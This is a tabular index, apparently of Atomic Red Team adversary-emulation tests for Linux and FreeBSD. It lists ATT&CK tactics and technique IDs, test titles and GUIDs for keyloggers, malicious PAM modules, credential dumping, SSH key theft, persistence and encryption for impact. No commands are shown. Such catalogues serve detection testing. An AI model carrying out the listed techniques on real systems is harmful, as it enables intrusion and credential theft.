198 persistence T1078.003 Valid Accounts: Local Accounts 13 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
199 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
200 command-and-control T1132.001 Data Encoding: Standard Encoding 2 Base64 Encoded data (freebsd) 2d97c626-7652-449e-a986-b02d9051c298 sh
201 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
202 command-and-control T1090.003 Proxy: Multi-hop Proxy 5 Tor Proxy Usage - FreeBSD 550ec67d-a99e-408b-816a-689271b27d2a sh
203 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
204 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
205 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 sh
217 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
218 collection T1560.001 Archive Collected Data: Archive via Utility 9 Encrypts collected data with AES-256 and Base64 a743e3a6-e8b2-4a30-abe7-ca85d201b5d3 bash
219 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
220 collection T1113 Screen Capture 4 X Windows Capture (freebsd) 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c sh
221 collection T1113 Screen Capture 5 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
222 collection T1113 Screen Capture 6 Capture Linux Desktop using Import Tool (freebsd) 18397d87-38aa-4443-a098-8a48a8ca5d8d sh
223 collection T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
224 collection T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
225 collection T1056.001 Input Capture: Keylogging 4 Logging sh history to syslog/messages b04284dc-3bd9-4840-8d21-61b8d31c99f2 sh
226 collection T1056.001 Input Capture: Keylogging 5 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 bash
227 collection T1056.001 Input Capture: Keylogging 6 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
228 collection T1056.001 Input Capture: Keylogging 7 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
229 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
230 collection T1074.001 Data Staged: Local Data Staging 3 Stage data from Discovery.sh (freebsd) 4fca7b49-379d-4493-8890-d6297750fa46 sh
231 collection T1115 Clipboard Data 5 Add or copy content to clipboard with xClip ee363e53-b083-4230-aff3-f8d955f2d5bb sh
232 collection T1560.002 Archive Collected Data: Archive via Library 1 Compressing data using GZip in Python (FreeBSD/Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 sh
233 collection T1560.002 Archive Collected Data: Archive via Library 2 Compressing data using bz2 in Python (FreeBSD/Linux) c75612b2-9de0-4d7c-879c-10d7b077072d sh
234 collection T1560.002 Archive Collected Data: Archive via Library 3 Compressing data using zipfile in Python (FreeBSD/Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 sh
235 collection T1560.002 Archive Collected Data: Archive via Library 4 Compressing data using tarfile in Python (FreeBSD/Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db sh
236 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
237 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Sudo usage (freebsd) 2bf9a018-4664-438a-b435-cc6f8c6f71b1 sh
238 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
239 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 4 Unlimited sudo cache timeout (freebsd) a83ad6e8-6f24-4d7f-8f44-75f8ab742991 sh
240 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 5 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
241 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 6 Disable tty_tickets for sudo caching (freebsd) 4df6a0fe-2bdd-4be8-8618-a6a19654a57a sh
242 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
243 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
244 privilege-escalation T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
245 privilege-escalation T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
246 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
247 privilege-escalation T1546.005 Event Triggered Execution: Trap 2 Trap EXIT (freebsd) be1a5d70-6865-44aa-ab50-42244c9fd16f sh
248 privilege-escalation T1546.005 Event Triggered Execution: Trap 3 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
249 privilege-escalation T1546.005 Event Triggered Execution: Trap 4 Trap SIGINT (freebsd) ade10242-1eac-43df-8412-be0d4c704ada sh
250 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
251 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
252 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
253 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Make and modify binary from C source (freebsd) dd580455-d84b-481b-b8b0-ac96f3b1dc4c sh
254 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
255 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Set a SetUID flag on file (freebsd) 9be9b827-ff47-4e1b-bef8-217db6fb7283 sh
256 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
257 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Set a SetGID flag on file (freebsd) 1f73af33-62a8-4bf1-bd10-3bea931f2c0d sh
258 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
259 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 8 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
260 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 9 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
265 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
266 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
267 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
268 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 3 Add command to .shrc 41502021-591a-4649-8b6e-83c9192aff53 sh
269 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 4 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
270 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 5 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
271 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 6 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
272 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 7 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
273 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
274 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
275 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 4 rc.local (FreeBSD) 2015fb48-8ab6-4fbf-928b-0b62de5c9476 sh
276 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
277 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 2 Create SysV Service 760fe8d2-79d9-494f-905e-a239a3df86f6 sh
278 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 3 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
279 privilege-escalation T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
280 privilege-escalation T1053.002 Scheduled Task/Job: At 3 At - Schedule a job freebsd 549863fb-1c91-467e-97fc-1fa32b9f356b sh
281 privilege-escalation T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
282 privilege-escalation T1078.003 Valid Accounts: Local Accounts 9 Create local account (FreeBSD) 95158cc9-8f6d-4889-9531-9be3f7f095e0 sh
283 privilege-escalation T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
284 privilege-escalation T1078.003 Valid Accounts: Local Accounts 11 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
285 privilege-escalation T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
286 privilege-escalation T1078.003 Valid Accounts: Local Accounts 13 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
287 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
288 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM rule (freebsd) b17eacac-282d-4ca8-a240-46602cf863e3 sh
289 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 3 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
290 credential-access T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
291 credential-access T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
292 credential-access T1056.001 Input Capture: Keylogging 4 Logging sh history to syslog/messages b04284dc-3bd9-4840-8d21-61b8d31c99f2 sh
293 credential-access T1056.001 Input Capture: Keylogging 5 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 bash
294 credential-access T1056.001 Input Capture: Keylogging 6 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
295 credential-access T1056.001 Input Capture: Keylogging 7 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
296 credential-access T1110.001 Brute Force: Password Guessing 5 SUDO Brute Force - Debian ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 bash
297 credential-access T1110.001 Brute Force: Password Guessing 6 SUDO Brute Force - Redhat 4097bc00-5eeb-4d56-aaf9-287d60351d95 bash
298 credential-access T1110.001 Brute Force: Password Guessing 7 SUDO Brute Force - FreeBSD abcde488-e083-4ee7-bc85-a5684edd7541 bash
299 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
300 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 2 Dump individual process memory with sh on FreeBSD (Local) fa37b633-e097-4415-b2b8-c5bf4c86e423 sh
301 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 3 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
302 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 4 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
303 credential-access T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
304 credential-access T1040 Network Sniffing 2 Packet Capture FreeBSD using tshark or tcpdump c93f2492-9ebe-44b5-8b45-36574cccfe67 sh
305 credential-access T1040 Network Sniffing 10 Packet Capture FreeBSD using /dev/bpfN with sudo e2028771-1bfb-48f5-b5e6-e50ee0942a14 sh
306 credential-access T1040 Network Sniffing 11 Filtered Packet Capture FreeBSD using /dev/bpfN with sudo a3a0d4c9-c068-4563-a08d-583bd05b884c sh
307 credential-access T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
308 credential-access T1040 Network Sniffing 13 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
309 credential-access T1040 Network Sniffing 14 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
312 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
313 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
314 credential-access T1552.004 Unsecured Credentials: Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
315 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with CP (freebsd) 12e4a260-a7fd-4ed8-bf18-1a28c1395775 sh
316 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
317 credential-access T1552.004 Unsecured Credentials: Private Keys 6 Copy Private SSH Keys with rsync (freebsd) 922b1080-0b95-42b0-9585-b9a5ea0af044 sh
318 credential-access T1552.004 Unsecured Credentials: Private Keys 7 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
319 credential-access T1552.004 Unsecured Credentials: Private Keys 8 Copy the users GnuPG directory with rsync (freebsd) b05ac39b-515f-48e9-88e9-2f141b5bcad0 sh
320 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
321 credential-access T1552.003 Unsecured Credentials: Bash History 2 Search Through sh History d87d3b94-05b4-40f2-a80f-99864ffa6803 sh
322 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 sh
323 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
324 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
325 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
326 credential-access T1110.004 Brute Force: Credential Stuffing 3 SSH Credential Stuffing From FreeBSD a790d50e-7ebf-48de-8daa-d9367e0911d4 sh
327 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
328 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 2 Access /etc/master.passwd (Local) 5076874f-a8e6-4077-8ace-9e5ab54114a5 sh
329 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 3 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
330 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 4 Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a sh
331 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 5 Access /etc/{shadow,passwd,master.passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 sh
336 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
337 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
338 discovery T1087.001 Account Discovery: Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
339 discovery T1087.001 Account Discovery: Local Account 6 Show if a user account has ever logged in remotely (freebsd) 0f73418f-d680-4383-8a24-87bc97fe4e35 sh
340 discovery T1087.001 Account Discovery: Local Account 7 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
341 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
342 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (FreeBSD) e129d73b-3e03-4ae9-bf1e-67fc8921e0fd sh
343 discovery T1069.002 Permission Groups Discovery: Domain Groups 15 Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS d58d749c-4450-4975-a9e9-8b1d562755c2 sh
344 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
345 discovery T1007 System Service Discovery 4 System Service Discovery - service b2e1c734-7336-40f9-b970-b04731cbaf8a sh
346 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
347 discovery T1040 Network Sniffing 2 Packet Capture FreeBSD using tshark or tcpdump c93f2492-9ebe-44b5-8b45-36574cccfe67 sh
348 discovery T1040 Network Sniffing 10 Packet Capture FreeBSD using /dev/bpfN with sudo e2028771-1bfb-48f5-b5e6-e50ee0942a14 sh
349 discovery T1040 Network Sniffing 11 Filtered Packet Capture FreeBSD using /dev/bpfN with sudo a3a0d4c9-c068-4563-a08d-583bd05b884c sh
350 discovery T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
351 discovery T1040 Network Sniffing 13 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
352 discovery T1040 Network Sniffing 14 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
353 discovery T1040 Network Sniffing 15 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
354 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
355 discovery T1135 Network Share Discovery 3 Network Share Discovery - FreeBSD 77e468a6-3e5c-45a1-9948-c4b5603747cb sh
356 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
357 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
358 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
359 discovery T1082 System Information Discovery 6 FreeBSD VM Check via Kernel Modules eefe6a49-d88b-41d8-8fc2-b46822da90d3 sh
360 discovery T1082 System Information Discovery 8 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 sh
361 discovery T1082 System Information Discovery 12 Environment variables discovery on freebsd, macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
362 discovery T1082 System Information Discovery 25 Linux List Kernel Modules 034fe21c-3186-49dd-8d5d-128b35f181c7 sh
363 discovery T1082 System Information Discovery 26 FreeBSD List Kernel Modules 4947897f-643a-4b75-b3f5-bed6885749f6 sh
364 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
365 discovery T1217 Browser Bookmark Discovery 4 List Google Chromium Bookmark JSON Files on FreeBSD 88ca025b-3040-44eb-9168-bd8af22b82fa sh
366 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
367 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (freebsd) 7625b978-4efd-47de-8744-add270374bee sh
368 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
369 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
370 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery FreeBSD, Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
371 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
372 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
373 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
374 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - FreeBSD a7893624-a3d7-4aed-9676-80498f31820f sh
375 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
376 discovery T1201 Password Policy Discovery 4 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
377 discovery T1201 Password Policy Discovery 5 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
380 discovery T1614.001 System Location Discovery: System Language Discovery 5 Discover System Language by locale file 5d7057c9-2c8a-4026-91dd-13b5584daa69 sh
381 discovery T1614.001 System Location Discovery: System Language Discovery 6 Discover System Language by Environment Variable Query cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a sh
382 discovery T1518.001 Software Discovery: Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
383 discovery T1518.001 Software Discovery: Security Software Discovery 5 Security Software Discovery - pgrep (FreeBSD) fa96c21c-5fd6-4428-aa28-51a2fbecdbdc sh
384 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
385 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
386 discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
387 discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
388 discovery T1018 Remote System Discovery 14 Remote System Discovery - netstat d2791d72-b67f-4615-814f-ec824a91f514 sh
389 discovery T1018 Remote System Discovery 15 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
390 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
391 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
392 discovery T1046 Network Service Discovery 3 Port Scan Nmap for FreeBSD f03d59dc-0e3b-428a-baeb-3499552c7048 sh
393 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
394 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (FreeBSD/Linux) 7b8ce084-3922-4618-8d22-95f996173765 sh
395 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (FreeBSD/Linux) 53e6735a-4727-44cc-b35b-237682a151ad sh
401 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - FreeBSD/macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de sh
402 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - FreeBSD/macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 sh
403 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - FreeBSD/Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd sh
404 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - FreeBSD 7b1cee42-320f-4890-b056-d65c8b884ba5 sh
405 impact T1529 System Shutdown/Reboot 8 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
406 impact T1529 System Shutdown/Reboot 9 Shutdown System via `poweroff` - FreeBSD/Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa sh
407 impact T1529 System Shutdown/Reboot 10 Reboot System via `poweroff` - FreeBSD 5a282e50-86ff-438d-8cef-8ae01c9e62e1 sh
408 impact T1529 System Shutdown/Reboot 11 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
409 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
410 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
411 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
412 execution T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
413 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
414 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
422 execution T1059.004 Command and Scripting Interpreter: Bash 7 What shells are available bf23c7dc-1004-4949-8262-4c1d1ef87702 sh
423 execution T1059.004 Command and Scripting Interpreter: Bash 8 Command line scripts b04ed73c-7d43-4dc8-b563-a2fc595cba1a sh
424 execution T1059.004 Command and Scripting Interpreter: Bash 9 Obfuscated command line scripts 5bec4cc8-f41e-437b-b417-33ff60acf9af sh
425 execution T1059.004 Command and Scripting Interpreter: Bash 10 Obfuscated command line scripts (freebsd) 5dc1d9dd-f396-4420-b985-32b1c4f79062 sh
426 execution T1059.004 Command and Scripting Interpreter: Bash 11 Change login shell c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 bash
427 execution T1059.004 Command and Scripting Interpreter: Bash 12 Change login shell (freebsd) 33b68b9b-4988-4caf-9600-31b7bf04227c sh
428 execution T1059.004 Command and Scripting Interpreter: Bash 13 Environment variable scripts bdaebd56-368b-4970-a523-f905ff4a8a51 bash
429 execution T1059.004 Command and Scripting Interpreter: Bash 14 Environment variable scripts (freebsd) 663b205d-2121-48a3-a6f9-8c9d4d87dfee sh
430 execution T1059.004 Command and Scripting Interpreter: Bash 15 Detecting pipe-to-shell fca246a8-a585-4f28-a2df-6495973976a1 bash
431 execution T1059.004 Command and Scripting Interpreter: Bash 16 Detecting pipe-to-shell (freebsd) 1a06b1ec-0cca-49db-a222-3ebb6ef25632 sh
432 execution T1059.004 Command and Scripting Interpreter: Bash 17 Current kernel information enumeration 3a53734a-9e26-4f4b-ad15-059e767f5f14 sh
